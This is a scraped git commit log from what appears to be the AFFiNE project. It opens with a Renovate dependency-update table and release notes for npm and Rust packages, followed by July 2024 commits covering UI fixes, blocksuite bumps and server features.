| [file-type](https://togithub.com/sindresorhus/file-type ) | [`19.1.1` -> `19.3.0`](https://renovatebot.com/diffs/npm/file-type/19.1.1/19.3.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [html-validate](https://html-validate.org ) ([source](https://gitlab.com/html-validate/html-validate )) | [`8.20.1` -> `8.21.0`](https://renovatebot.com/diffs/npm/html-validate/8.20.1/8.21.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [husky](https://togithub.com/typicode/husky ) | [`9.0.11` -> `9.1.2`](https://renovatebot.com/diffs/npm/husky/9.0.11/9.1.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [i18next](https://www.i18next.com ) ([source](https://togithub.com/i18next/i18next )) | [`23.12.1` -> `23.12.2`](https://renovatebot.com/diffs/npm/i18next/23.12.1/23.12.2 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [jotai](https://togithub.com/pmndrs/jotai ) | [`2.9.0` -> `2.9.1`](https://renovatebot.com/diffs/npm/jotai/2.9.0/2.9.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [jotai](https://togithub.com/pmndrs/jotai ) | [`2.9.0` -> `2.9.1`](https://renovatebot.com/diffs/npm/jotai/2.9.0/2.9.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [lucide-react](https://lucide.dev ) ([source](https://togithub.com/lucide-icons/lucide/tree/HEAD/packages/lucide-react )) | [`^0.408.0` -> `^0.416.0`](https://renovatebot.com/diffs/npm/lucide-react/0.408.0/0.416.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [mixpanel-browser](https://togithub.com/mixpanel/mixpanel-js ) | [`2.53.0` -> `2.54.0`](https://renovatebot.com/diffs/npm/mixpanel-browser/2.53.0/2.54.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [msw](https://mswjs.io ) ([source](https://togithub.com/mswjs/msw )) | [`2.3.1` -> `2.3.4`](https://renovatebot.com/diffs/npm/msw/2.3.1/2.3.4 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [napi](https://togithub.com/napi-rs/napi-rs ) | `3.0.0-alpha.7` -> `3.0.0-alpha.8` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [napi-derive](https://togithub.com/napi-rs/napi-rs ) | `3.0.0-alpha.6` -> `3.0.0-alpha.7` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | patch |
| [node](https://nodejs.org ) ([source](https://togithub.com/nodejs/node )) | `20.15.1` -> `20.16.0` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | | minor |
| [nx](https://nx.dev ) ([source](https://togithub.com/nrwl/nx/tree/HEAD/packages/nx )) | [`19.4.3` -> `19.5.3`](https://renovatebot.com/diffs/npm/nx/19.4.3/19.5.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [openai](https://togithub.com/openai/openai-node ) | [`4.52.7` -> `4.53.1`](https://renovatebot.com/diffs/npm/openai/4.52.7/4.53.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| openresty/openresty | `1.25.3.1-0-buster` -> `1.25.3.2-0-buster` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | final | patch |
| [playwright](https://playwright.dev ) ([source](https://togithub.com/microsoft/playwright )) | [`=1.44.1` -> `=1.45.3`](https://renovatebot.com/diffs/npm/playwright/1.44.1/1.45.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [postcss](https://postcss.org/ ) ([source](https://togithub.com/postcss/postcss )) | [`8.4.39` -> `8.4.40`](https://renovatebot.com/diffs/npm/postcss/8.4.39/8.4.40 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [prisma](https://www.prisma.io ) ([source](https://togithub.com/prisma/prisma/tree/HEAD/packages/cli )) | [`5.16.2` -> `5.17.0`](https://renovatebot.com/diffs/npm/prisma/5.16.2/5.17.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [react-resizable-panels](https://togithub.com/bvaughn/react-resizable-panels ) | [`2.0.20` -> `2.0.22`](https://renovatebot.com/diffs/npm/react-resizable-panels/2.0.20/2.0.22 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [react-router-dom](https://togithub.com/remix-run/react-router ) ([source](https://togithub.com/remix-run/react-router/tree/HEAD/packages/react-router-dom )) | [`6.24.1` -> `6.25.1`](https://renovatebot.com/diffs/npm/react-router-dom/6.24.1/6.25.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
| [react-router-dom](https://togithub.com/remix-run/react-router ) ([source](https://togithub.com/remix-run/react-router/tree/HEAD/packages/react-router-dom )) | [`6.24.1` -> `6.25.1`](https://renovatebot.com/diffs/npm/react-router-dom/6.24.1/6.25.1 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [react-virtuoso](https://virtuoso.dev/ ) ([source](https://togithub.com/petyosi/react-virtuoso )) | [`4.7.12` -> `4.7.13`](https://renovatebot.com/diffs/npm/react-virtuoso/4.7.12/4.7.13 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [semver](https://togithub.com/npm/node-semver ) | [`7.6.2` -> `7.6.3`](https://renovatebot.com/diffs/npm/semver/7.6.2/7.6.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [semver](https://togithub.com/npm/node-semver ) | [`7.6.2` -> `7.6.3`](https://renovatebot.com/diffs/npm/semver/7.6.2/7.6.3 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [sqlx](https://togithub.com/launchbadge/sqlx ) | `0.7` -> `0.8` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | minor |
| [stripe](https://togithub.com/stripe/stripe-node ) | [`16.2.0` -> `16.5.0`](https://renovatebot.com/diffs/npm/stripe/16.2.0/16.5.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | minor |
| [tailwindcss](https://tailwindcss.com ) ([source](https://togithub.com/tailwindlabs/tailwindcss )) | [`3.4.5` -> `3.4.7`](https://renovatebot.com/diffs/npm/tailwindcss/3.4.5/3.4.7 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [tokio](https://tokio.rs ) ([source](https://togithub.com/tokio-rs/tokio )) | `1.38.0` -> `1.39.1` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dev-dependencies | minor |
| [tokio](https://tokio.rs ) ([source](https://togithub.com/tokio-rs/tokio )) | `1.38.0` -> `1.39.1` | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | workspace.dependencies | minor |
| [typedoc](https://typedoc.org ) ([source](https://togithub.com/TypeStrong/TypeDoc )) | [`0.26.4` -> `0.26.5`](https://renovatebot.com/diffs/npm/typedoc/0.26.4/0.26.5 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [typescript](https://www.typescriptlang.org/ ) ([source](https://togithub.com/Microsoft/TypeScript )) | [`5.5.3` -> `5.5.4`](https://renovatebot.com/diffs/npm/typescript/5.5.3/5.5.4 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [typescript](https://www.typescriptlang.org/ ) ([source](https://togithub.com/Microsoft/TypeScript )) | [`5.5.3` -> `5.5.4`](https://renovatebot.com/diffs/npm/typescript/5.5.3/5.5.4 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [undici](https://undici.nodejs.org ) ([source](https://togithub.com/nodejs/undici )) | [`6.19.2` -> `6.19.4`](https://renovatebot.com/diffs/npm/undici/6.19.2/6.19.4 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | dependencies | patch |
| [undici](https://undici.nodejs.org ) ([source](https://togithub.com/nodejs/undici )) | [`6.19.2` -> `6.19.4`](https://renovatebot.com/diffs/npm/undici/6.19.2/6.19.4 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [vite](https://vitejs.dev ) ([source](https://togithub.com/vitejs/vite/tree/HEAD/packages/vite )) | [`5.3.3` -> `5.3.5`](https://renovatebot.com/diffs/npm/vite/5.3.3/5.3.5 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | patch |
| [wrangler](https://togithub.com/cloudflare/workers-sdk ) ([source](https://togithub.com/cloudflare/workers-sdk/tree/HEAD/packages/wrangler )) | [`3.64.0` -> `3.67.0`](https://renovatebot.com/diffs/npm/wrangler/3.64.0/3.67.0 ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | [](https://docs.renovatebot.com/merge-confidence/ ) | devDependencies | minor |
---
### Release Notes
<details>
<summary>apollographql/apollo-server (@​apollo/server)</summary>
### [`v4.10.5`](https://togithub.com/apollographql/apollo-server/blob/HEAD/packages/server/CHANGELOG.md#4105 )
[Compare Source](https://togithub.com/apollographql/apollo-server/compare/@apollo/server@4.10.4...@apollo/server@4.10.5 )
##### Patch Changes
- [#​7821](https://togithub.com/apollographql/apollo-server/pull/7821 ) [`b2e15e7`](b2e15e7db6 ) Thanks [@​renovate](https://togithub.com/apps/renovate )! - Non-major dependency updates
- [#​7900](https://togithub.com/apollographql/apollo-server/pull/7900 ) [`86d7111`](86d711133f ) Thanks [@​trevor-scheer](https://togithub.com/trevor-scheer )! - Inline a small dependency that was causing build issues for ESM projects
</details>
<details>
<summary>aws/aws-sdk-js-v3 (@​aws-sdk/client-s3)</summary>
### [`v3.620.0`](https://togithub.com/aws/aws-sdk-js-v3/blob/HEAD/clients/client-s3/CHANGELOG.md#36200-2024-07-25 )
[Compare Source](https://togithub.com/aws/aws-sdk-js-v3/compare/v3.617.0...v3.620.0 )
**Note:** Version bump only for package [@​aws-sdk/client-s3](https://togithub.com/aws-sdk/client-s3 )
### [`v3.617.0`](https://togithub.com/aws/aws-sdk-js-v3/blob/HEAD/clients/client-s3/CHANGELOG.md#36170-2024-07-22 )
[Compare Source](https://togithub.com/aws/aws-sdk-js-v3/compare/v3.616.0...v3.617.0 )
**Note:** Version bump only for package [@​aws-sdk/client-s3](https://togithub.com/aws-sdk/client-s3 )
### [`v3.616.0`](https://togithub.com/aws/aws-sdk-js-v3/blob/HEAD/clients/client-s3/CHANGELOG.md#36160-2024-07-18 )
[Compare Source](https://togithub.com/aws/aws-sdk-js-v3/compare/v3.614.0...v3.616.0 )
**Note:** Version bump only for package [@​aws-sdk/client-s3](https://togithub.com/aws-sdk/client-s3 )
</details>
<details>
<summary>emotion-js/emotion (@​emotion/cache)</summary>
### [`v11.13.1`](https://togithub.com/emotion-js/emotion/releases/tag/%40emotion/cache%4011.13.1 )
[Compare Source](https://togithub.com/emotion-js/emotion/compare/@emotion/cache@11.13.0...@emotion/cache@11.13.1 )
##### Patch Changes
- [#​3219](https://togithub.com/emotion-js/emotion/pull/3219 ) [`c72d279`](c72d2798fe ) Thanks [@​Andarist](https://togithub.com/Andarist )! - Removed incorrect tripleslash directive referencing node types
### [`v11.13.0`](https://togithub.com/emotion-js/emotion/compare/@emotion/jest@11.11.0...70ad1d33892091e9bc478792fa7da662ed63476a )
[Compare Source](https://togithub.com/emotion-js/emotion/compare/@emotion/cache@11.12.0...@emotion/cache@11.13.0 )
### [`v11.12.0`](https://togithub.com/emotion-js/emotion/compare/@emotion/babel-preset-css-prop@11.11.0...d57cfcb6daf48fc5458f91b4db2e072fbc2863e4 )
[Compare Source](https://togithub.com/emotion-js/emotion/compare/@emotion/cache@11.11.0...@emotion/cache@11.12.0 )
</details>
<details>
<summary>floating-ui/floating-ui (@​floating-ui/dom)</summary>
### [`v1.6.8`](https://togithub.com/floating-ui/floating-ui/blob/HEAD/packages/dom/CHANGELOG.md#168 )
[Compare Source](https://togithub.com/floating-ui/floating-ui/compare/@floating-ui/dom@1.6.7...@floating-ui/dom@1.6.8 )
##### Patch Changes
- Update dependencies: `@floating-ui/utils@0.2.5`
</details>
<details>
<summary>napi-rs/napi-rs (@​napi-rs/cli)</summary>
### [`v3.0.0-alpha.62`](https://togithub.com/napi-rs/napi-rs/compare/@napi-rs/cli@3.0.0-alpha.61...@napi-rs/cli@3.0.0-alpha.62 )
[Compare Source](https://togithub.com/napi-rs/napi-rs/compare/@napi-rs/cli@3.0.0-alpha.61...@napi-rs/cli@3.0.0-alpha.62 )
### [`v3.0.0-alpha.61`](https://togithub.com/napi-rs/napi-rs/compare/@napi-rs/cli@3.0.0-alpha.60...@napi-rs/cli@3.0.0-alpha.61 )
[Compare Source](https://togithub.com/napi-rs/napi-rs/compare/@napi-rs/cli@3.0.0-alpha.60...@napi-rs/cli@3.0.0-alpha.61 )
</details>
<details>
<summary>Brooooooklyn/simple-git (@​napi-rs/simple-git)</summary>
### [`v0.1.17`](https://togithub.com/Brooooooklyn/simple-git/releases/tag/v0.1.17 )
[Compare Source](https://togithub.com/Brooooooklyn/simple-git/compare/v0.1.16...v0.1.17 )
##### What's Changed
- chore(deps): update yarn to v4.1.0 by [@​renovate](https://togithub.com/renovate ) in [https://github.com/Brooooooklyn/simple-git/pull/37 ](https://togithub.com/Brooooooklyn/simple-git/pull/37 )
- chore(deps): lock file maintenance by [@​renovate](https://togithub.com/renovate ) in [https://github.com/Brooooooklyn/simple-git/pull/38 ](https://togithub.com/Brooooooklyn/simple-git/pull/38 )
- chore(deps): lock file maintenance by [@​renovate](https://togithub.com/renovate ) in [https://github.com/Brooooooklyn/simple-git/pull/39 ](https://togithub.com/Brooooooklyn/simple-git/pull/39 )
- feat: impl tags features by [@​Brooooooklyn](https://togithub.com/Brooooooklyn ) in [https://github.com/Brooooooklyn/simple-git/pull/40 ](https://togithub.com/Brooooooklyn/simple-git/pull/40 )
- fix: impl Send for GitDateTask by [@​Brooooooklyn](https://togithub.com/Brooooooklyn ) in [https://github.com/Brooooooklyn/simple-git/pull/43 ](https://togithub.com/Brooooooklyn/simple-git/pull/43 )
- chore(deps): update yarn to v4.1.1 by [@​renovate](https://togithub.com/renovate ) in [https://github.com/Brooooooklyn/simple-git/pull/42 ](https://togithub.com/Brooooooklyn/simple-git/pull/42 )
- chore(deps): lock file maintenance by [@​renovate](https://togithub.com/renovate ) in [https://github.com/Brooooooklyn/simple-git/pull/41 ](https://togithub.com/Brooooooklyn/simple-git/pull/41 )
- chore(deps): lock file maintenance by [@​renovate](https://togithub.com/renovate ) in [https://github.com/Brooooooklyn/simple-git/pull/44 ](https://togithub.com/Brooooooklyn/simple-git/pull/44 )
- chore(deps): lock file maintenance by [@​renovate](https://togithub.com/renovate ) in [https://github.com/Brooooooklyn/simple-git/pull/45 ](https://togithub.com/Brooooooklyn/simple-git/pull/45 )
- chore: upgrade deps by [@​Brooooooklyn](https://togithub.com/Brooooooklyn ) in [https://github.com/Brooooooklyn/simple-git/pull/46 ](https://togithub.com/Brooooooklyn/simple-git/pull/46 )
- chore(deps): update yarn to v4.2.1 by [@​renovate](https://togithub.com/renovate ) in [https://github.com/Brooooooklyn/simple-git/pull/47 ](https://togithub.com/Brooooooklyn/simple-git/pull/47 )
- chore: remove npm dirs by [@​Brooooooklyn](https://togithub.com/Brooooooklyn ) in [https://github.com/Brooooooklyn/simple-git/pull/48 ](https://togithub.com/Brooooooklyn/simple-git/pull/48 )
- chore(deps): update yarn to v4.2.2 by [@​renovate](https://togithub.com/renovate ) in [https://github.com/Brooooooklyn/simple-git/pull/49 ](https://togithub.com/Brooooooklyn/simple-git/pull/49 )
- chore(deps): lock file maintenance by [@​renovate](https://togithub.com/renovate ) in [https://github.com/Brooooooklyn/simple-git/pull/50 ](https://togithub.com/Brooooooklyn/simple-git/pull/50 )
- chore(deps): update yarn to v4.3.0 by [@​renovate](https://togithub.com/renovate ) in [https://github.com/Brooooooklyn/simple-git/pull/51 ](https://togithub.com/Brooooooklyn/simple-git/pull/51 )
- chore(deps): update yarn to v4.3.1 by [@​renovate](https://togithub.com/renovate ) in [https://github.com/Brooooooklyn/simple-git/pull/53 ](https://togithub.com/Brooooooklyn/simple-git/pull/53 )
- chore: update git2 by [@​Brooooooklyn](https://togithub.com/Brooooooklyn ) in [https://github.com/Brooooooklyn/simple-git/pull/54 ](https://togithub.com/Brooooooklyn/simple-git/pull/54 )
- chore(deps): lock file maintenance by [@​renovate](https://togithub.com/renovate ) in [https://github.com/Brooooooklyn/simple-git/pull/55 ](https://togithub.com/Brooooooklyn/simple-git/pull/55 )
- build: support powerpc64le-unknown-linux-gnu and s390x-unknown-linux-gnu by [@​Brooooooklyn](https://togithub.com/Brooooooklyn ) in [https://github.com/Brooooooklyn/simple-git/pull/56 ](https://togithub.com/Brooooooklyn/simple-git/pull/56 )
**Full Changelog**: https://github.com/Brooooooklyn/simple-git/compare/v0.1.16...v0.1.17
</details>
<details>
<summary>nrwl/nx (@​nx/vite)</summary>
### [`v19.5.3`](https://togithub.com/nrwl/nx/releases/tag/19.5.3 )
[Compare Source](https://togithub.com/nrwl/nx/compare/19.5.2...19.5.3 )
#### 19.5.3 (2024-07-24)
##### 🚀 Features
- **core:** error when running atomized tasks outside of DTE ([#​26898](https://togithub.com/nrwl/nx/pull/26898 ))
- **core:** update pnpm/action-setup to v4 in ci-workflow generator ([#​26838](https://togithub.com/nrwl/nx/pull/26838 ))
- **js:** add scopes option for verdaccio ([#​26918](https://togithub.com/nrwl/nx/pull/26918 ))
- **misc:** prioritize github onboarding flow ([#​27085](https://togithub.com/nrwl/nx/pull/27085 ))
- **misc:** only create one commit with cloud onboard URL on cnw ([#​27093](https://togithub.com/nrwl/nx/pull/27093 ))
- **module-federation:** improve console output for remote build errors ([#​26711](https://togithub.com/nrwl/nx/pull/26711 ))
- **module-federation:** support setremotedefinition api ([#​27051](https://togithub.com/nrwl/nx/pull/27051 ))
- **nx-dev:** Migrate careers from nx.app ([#​27020](https://togithub.com/nrwl/nx/pull/27020 ))
- **nx-dev:** reprioritize customer logos on landing page ([#​27061](https://togithub.com/nrwl/nx/pull/27061 ))
##### 🩹 Fixes
- **angular:** remove unnecessary esbuild peer dependency ([#​27046](https://togithub.com/nrwl/nx/pull/27046 ))
- **bundling:** prevent exports overwrite with esbuild ([#​27047](https://togithub.com/nrwl/nx/pull/27047 ))
- **bundling:** get workspace package prefix length correctly [#​20817](https://togithub.com/nrwl/nx/issues/20817 ) ([#​27092](https://togithub.com/nrwl/nx/pull/27092 ), [#​20817](https://togithub.com/nrwl/nx/issues/20817 ))
- **core:** fix watch daemon error ([#​27067](https://togithub.com/nrwl/nx/pull/27067 ))
- **core:** ensure output paths returned are unique ([#​18207](https://togithub.com/nrwl/nx/pull/18207 ))
- **core:** use argument length that match the actual
2024-07-26 07:13:05 +00:00
darkskygit
3f0e4c04d7
feat: refector prompt refresh ( #7605 )
2024-07-26 04:51:07 +00:00
EYHN
54da85ec62
feat(core): init organize ( #7456 )
2024-07-26 04:35:32 +00:00
akumatus
b26b0c3a22
fix: journal doc title in at menu ( #7608 )
...
Fix issue [BS-900](https://linear.app/affine-design/issue/BS-900 ).
### What Changed?
- Add i18n for journal doc title and empty doc title.
2024-07-26 04:21:03 +00:00
darkskygit
470262d400
feat: migrate fal workflow to server ( #7581 )
2024-07-26 04:04:39 +00:00
CatsJuice
cb0d91facd
feat(core): support lifetime subscription from external link ( #7585 )
...
close AF-1101
2024-07-26 03:49:17 +00:00
CatsJuice
0617061c5b
fix(core): do not clip center-peek controls to make it appear more quickly ( #7572 )
...
fix AF-1084

2024-07-26 03:35:00 +00:00
CatsJuice
8646221ee8
feat(infra): add ability to mount nodes to nearest FrameworkScope root ( #7551 )
...

2024-07-26 03:19:27 +00:00
CatsJuice
22c36102b9
feat(core): move sidebar new page button beside quick-search ( #7578 )
...
close AF-1078
2024-07-26 03:04:10 +00:00
CatsJuice
a714961b20
feat(core): adjust subscription related mixpanel ( #7536 )
2024-07-26 02:49:15 +00:00
EYHN
549e7befed
fix(core): stuck when quick switch doc mode ( #7599 )
2024-07-25 12:21:21 +00:00
CatsJuice
11a2dc7d7f
feat(core): bump theme ( #7587 )
...
close AF-1108
2024-07-25 08:00:55 +00:00
L-Sun
662a3d4b76
refactor(core): use lit customelement decorator ( #7560 )
...
Close: [BS-585](https://linear.app/affine-design/issue/BS-585/更新affine侧lit自定义yuan素的写法 )
### What changes:
- using `@customElement(xxx)` instead of `window.customElements.define(xxx)`
- remove `registerOutlinePanelComponents` and `registerFramePanelComponents`, Related PR https://github.com/toeverything/blocksuite/pull/7700
2024-07-25 07:45:41 +00:00
donteatfriedrice
dd6901fe15
feat: bump blocksuite ( #7603 )
...
## Features
- https://github.com/toeverything/BlockSuite/pull/7717 @L-Sun
- https://github.com/toeverything/BlockSuite/pull/7691 @L-Sun
## Bugfix
- https://github.com/toeverything/BlockSuite/pull/7720 @akumatus
- https://github.com/toeverything/BlockSuite/pull/7719 @doouding
## Refactor
- https://github.com/toeverything/BlockSuite/pull/7703 @donteatfriedrice
- https://github.com/toeverything/BlockSuite/pull/7694 @doouding
- https://github.com/toeverything/BlockSuite/pull/7700 @L-Sun
- https://github.com/toeverything/BlockSuite/pull/7716 @doodlewind
## Misc
2024-07-25 07:26:40 +00:00
forehalo
2b42f84815
ci: wrong installer version used ( #7602 )
2024-07-25 06:29:22 +00:00
Brooooooklyn
8f60626291
chore: custom telemetry endpoint ( #7596 )
2024-07-25 03:17:32 +00:00
akumatus
1871c15cd0
feat: custom the items of linked menu by configuration ( #7554 )
...
Close issue [BS-719](https://linear.app/affine-design/issue/BS-719 ) and [BS-791](https://linear.app/affine-design/issue/BS-791 ).
Related PR in [BlockSuite](https://github.com/toeverything/blocksuite/pull/7693 ).
### What Changed?
- Support config in BlockSpec
- AFFiNE’s Custom @Menu
- ignore docs in trash
- ignore unedited journal
- customized journal icon

### What's next?
- getMenus returns an observable array
- Add commands field to BlockSpec and encapsulated insertLinkedNode into a command
2024-07-24 17:10:37 +00:00
LongYinan
20c4224e2d
build: fix undefined entry point ( #7594 )
2024-07-24 18:23:09 +08:00
forehalo
25b74467ce
fix(server): create dev user ( #7592 )
2024-07-24 10:01:53 +00:00
donteatfriedrice
9d446469f8
feat: support save chat to block ( #7481 )
2024-07-24 09:46:36 +00:00
EYHN
98281a6394
refactor(component): adjust confirm modal api ( #7589 )
2024-07-24 08:18:33 +00:00
EYHN
6ca7c41861
fix(component): button icon color ( #7588 )
2024-07-24 08:03:02 +00:00
CatsJuice
b1380ce81f
feat(core): adjust left-sidebar min-width to 248px ( #7575 )
...
close AF-1094
2024-07-24 02:43:25 +00:00
CatsJuice
091f5eec01
fix(core): remove hover state for ai-usage block in sidebar avtar menu ( #7573 )
...
fix AF-1059
2024-07-24 02:27:04 +00:00
akumatus
f89945e730
chore: bump blocksuite ( #7579 )
...
## Features
- https://github.com/toeverything/BlockSuite/pull/7693 @akumatus
## Bugfix
- https://github.com/toeverything/BlockSuite/pull/7713 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7710 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7709 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7707 @Saul-Mirone
- https://github.com/toeverything/BlockSuite/pull/7689 @fourdim
- https://github.com/toeverything/BlockSuite/pull/7699 @Saul-Mirone
## Refactor
- https://github.com/toeverything/BlockSuite/pull/7715 @doodlewind
- https://github.com/toeverything/BlockSuite/pull/7714 @doodlewind
- https://github.com/toeverything/BlockSuite/pull/7705 @doodlewind
## Misc
- https://github.com/toeverything/BlockSuite/pull/7712 @doodlewind
- https://github.com/toeverything/BlockSuite/pull/7711 @doodlewind
- https://github.com/toeverything/BlockSuite/pull/7706 @doodlewind
- https://github.com/toeverything/BlockSuite/pull/7592 @doouding
2024-07-23 15:24:57 +00:00
darkskygit
0dbed968a0
chore: add env for desktop test ( #7582 )
2024-07-23 15:10:08 +00:00
CatsJuice
b0ad36425d
fix(core): beliver plan should not show cancel subscription ( #7576 )
...
fix AF-1097
2024-07-23 10:54:22 +00:00
forehalo
dddbfe6473
feat(server): setup api for selfhost deployment ( #7569 )
